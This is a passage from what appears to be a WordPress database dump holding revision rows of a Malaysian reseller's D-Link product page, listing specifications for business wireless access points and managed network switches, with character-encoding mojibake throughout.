<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:24:50','2019-09-25 04:24:50','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(2656,1,'2018-12-20 14:54:01','2018-12-20 06:54:01','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:54:01','2018-12-20 06:54:01','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2657,1,'2018-12-20 14:55:09','2018-12-20 06:55:09','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access 